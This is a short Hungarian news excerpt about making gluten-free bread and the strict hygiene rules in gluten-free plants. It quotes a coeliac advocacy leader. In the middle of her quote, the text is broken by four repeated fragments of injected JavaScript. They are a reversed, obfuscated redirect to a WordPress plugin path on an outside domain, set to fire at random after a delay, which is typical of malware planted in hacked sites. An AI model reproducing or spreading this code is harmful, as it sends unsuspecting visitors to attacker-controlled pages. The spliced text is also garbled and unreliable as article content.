A cöliákiában, gluténérzékenységben szenvedőknek nagyon oda kell figyelniük, hogy milyen étel kerül az asztalukra. Egyre több gyártó próbálja ezeket az igényeket kielégíteni, de nincs könnyű dolguk, mert sokkal szigorúbb követelményeknek kell megfelelniük, mint egy hagyományos üzemnek. „A gyártónak fel kell készülnie, fel kell készítenie az üzemét, fel kell készítenie az alkalmazottait arra, hogy ami termék elhagyja az üzemet, az abszolút biztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonságos és garantált legyen” – mondta Koltai Tünde, a Lisztérzékenyek Érdekképviseletének Országos Egyesülete elnöke. Az üzembe semmilyen körülmények között nem kerülhet be gluténszennyeződés. Ezért az üzembe utcai ruhában tilos bemenni, és mindenkinek kötelező a megfelelő munkaruházat. Glutén- vagy mindenmentes –…
A cikk folytatódik: http://hazesotthon.co.hu/eletstilus/2018/03/06/igy-keszul-a-glutenmentes-kenyer.html
- Hirdetés -